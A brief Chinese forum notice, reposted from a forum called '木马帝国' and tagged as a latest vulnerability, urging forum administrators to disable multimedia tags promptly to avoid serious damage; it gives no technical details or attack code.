请各论坛管理员及时去掉多媒体标签的使用,以免给论坛造成严重损失.
文章转自木马帝国论坛
标签: {275}{276} 最新漏洞
